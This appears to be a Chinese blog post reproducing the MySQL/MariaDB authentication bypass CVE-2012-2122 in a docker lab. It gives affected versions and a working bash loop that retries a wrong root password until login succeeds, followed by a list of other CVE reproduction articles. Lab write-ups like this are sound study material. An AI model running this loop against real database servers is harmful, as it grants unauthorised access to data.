2. 程式人生 > 其它 >Mysql 身份認證繞過漏洞(CVE-2012-2122)

Mysql 身份認證繞過漏洞(CVE-2012-2122)

阿新 發佈:2022-05-13

當連線MariaDB/MySQL時,輸入的密碼會與期望的正確密碼比較,由於不正確的處理,會導致即便是memcmp()返回一個非零值,也會使MySQL認為兩個密碼是相同的。也就是說只要知道使用者名稱,不斷嘗試就能夠直接登入SQL資料庫。

受影響版本:

  • MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.
  • MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.

參考連結:

執行如下命令啟動測試環境:
docker-compose up -d
環境啟動後,將啟動一個Mysql服務(版本:5.5.23),監聽3306埠,通過正常的Mysql客戶端,可以直接登入的,正確root密碼是123456。

漏洞驗證

正常情況我們會做埠掃描,指紋探測:

然後在另一臺linux命令列模式下執行poc:

點選檢視程式碼
for i in `seq 1 1000`; do mysql -uroot -pwrong -h 192.168.84.201 -P 3306 ; done    #有時候管理員會改預設埠,注意更換

成功登入:

相關推薦

Mysql 身份認證繞過漏洞CVE-2012-2122

當連線MariaDB/MySQL時,輸入的密碼會與期望的正確密碼比較,由於不正確的處理,會導致即便是memcmp()返回一個非零值,也會使MySQL認為兩個密碼是相同的。也就是說只要知道使用者名稱,不斷嘗試就能夠直接登入SQL資料

AppWeb認證繞過漏洞CVE-2018-8715

0x01漏洞概述 AppWeb 是一個基於開源 GPL 協議的嵌入式 Web 伺服器,該協議由 Embedthis Software LLC開發和維護。它是用C / C++編寫的,幾乎可以在任何現代作業系統上執行。當然,它旨在為嵌入式裝置提供 Web 應用程

Tiki Wiki CMS Groupware 認證繞過漏洞CVE-2020-15906

Tiki Wiki CMS Groupware或簡稱為Tiki最初稱為TikiWiki是一種免費且開源的基於Wiki的內容管理系統和線上辦公套件。在如下這些版本21.2, 20.4, 19.3, 18.7, 17.3, 16.4前存在一處邏輯錯誤,管理員賬戶被爆破60次以

【SQL】CVE-2012-2122 MySQL身份認證繞過漏洞復現

漏洞簡介 當連線 MariaDB / MySQL 時,輸入的密碼會與期望的正確密碼比較,由於不正確的處理,會導致即便是 memcmp() 返回一個非零值,也會使 MySQL 認為兩個密碼是相同的。

Tomcat 任意檔案上傳漏洞CVE-2017-12615

0x01簡介 2017年9月19日,Apache Tomcat官方確認並修復了兩個高危漏洞漏洞CVE編號:CVE-2017-12615和CVE-2017-12616,其中 遠端程式碼執行漏洞CVE-2017-12615 影響: Apache Tomcat 7.0.0 - 7.0.797.0.81修復不

Apache Shiro 1.2.4反序列化漏洞CVE-2016-4437

0x01簡介 Apache Shiro是一款開源安全框架,提供身份驗證、授權、密碼學和會話管理。Shiro框架直觀、易用,同時也能提供健壯的安全性。

Aapache Tomcat AJP 檔案包含漏洞CVE-2020-1938

0x01 簡介 Java 是目前 Web 開發中最主流的程式語言,而 Tomcat 是當前最流行的 Java 中介軟體伺服器之一,從初版釋出到現在已經有二十多年曆史,在世界範圍內廣泛使用。

Tomcat PUT高危漏洞CVE-2017-12615復現與分析

一、漏洞復現: BurpSuite抓包,傳送一個PUT的請求,資料包為冰蠍的馬 如果存在該漏洞,Response的狀態碼為201

Drupal<7.32“Drupalgeddon”SQL注入漏洞CVE-2014-3704

一、漏洞簡介 Drupal 是一款用量龐大的CMS,其7.0~7.31版本中存在一處無需認證的SQL漏洞。通過該漏洞,攻擊者可以執行任意SQL語句,插入、修改管理員資訊,甚至執行任意程式碼。

Apache Dubbo反序列化漏洞CVE-2019-17564復現分析

漏洞描述 Apache Dubbo是一款高效能Java RPC框架,核心功能是方便麵向介面的遠端過程呼叫,叢集容錯和負載均衡,以及服務自動註冊與發現。

漏洞復現系列】WebLogic XMLDecoder反序列化漏洞CVE-2017-10271

使用vulhub環境: https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2017-10271 啟動測試環境:

Apache Shiro 1.2.4反序列化漏洞CVE-2016-4437復現

Apache Shiro 1.2.4反序列化漏洞CVE-2016-4437復現 環境搭建 docker pull medicean/vulapps:s_shiro_1

企業安全06-Apache Log4j Server 反序列化命令執行漏洞CVE-2017-5645

CVE-2017-5645 Apache Log4j Server 反序列化命令執行漏洞(CVE-2017-5645 一、漏洞原理 Apache Log4j是一個用於Java的日誌記錄庫,其支援啟動遠端日誌伺服器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻

ActiveMQ反序列化漏洞CVE-2015-5254復現

ActiveMQ反序列化漏洞CVE-2015-5254復現 導語 Apache ActiveMQ是美國阿帕奇Apache軟體基金會所研發的一套開源的訊息中介軟體,它支援Java訊息服務、叢集、Spring Framework等。

sql server 遠端訪問informix_微軟 SQL Server 遠端程式碼執行漏洞CVE-2020-0618

技術標籤:sql server 遠端訪問informix 漏洞描述 近日,微軟釋出了2月安全更新公告,其中CVE-2020-0618 SQL Server 遠端命令執行漏洞在國記憶體在危害,SQL Server 在國內使用量大。

Weblogic命令執行漏洞CVE-2018-2628復現

一、漏洞環境搭建 CVE-2018-2628影響的軟體版本為: Weblogic 10.3.6.0 Weblogic 12.1.3.0 Weblogic 12.2.1.2

漏洞復現:ActiveMQ任意檔案寫入漏洞CVE-2016-3088

一、漏洞描述 該漏洞出現在fileserver應用中,漏洞原理:ActiveMQ中的fileserver服務允許使用者通過HTTP PUT方法上傳檔案到指定目錄。Fileserver支援寫入檔案(不解析jsp),但是支援移動檔案(Move)我們可以將jsp的檔案PU

Linux sudo許可權提升漏洞CVE-2021-3156復現

技術標籤:安全安全 漏洞概述 1月26日,Sudo釋出安全通告,修復了一個類Unix作業系統在命令引數中轉義反斜槓時存在基於堆的緩衝區溢位漏洞。當sudo通過-s或-i命令列選項在shell模式下執行命令時,它將在命令引數

Joomla 3.4.5 反序列化漏洞CVE-2015-8562

Joomla 3.4.5 反序列化漏洞(CVE-2015-8562 2021年8月22日 21:22 漏洞介紹: 本漏洞根源是PHP5.6.13前的版本在讀取儲存好的session時,如果反序列化出錯則會跳過當前一段資料而去反序列化下一段資料。而Jooml

Nginx 檔名邏輯漏洞CVE-2013-4547復現

影響版本:Nginx 0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7 參考連結: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4547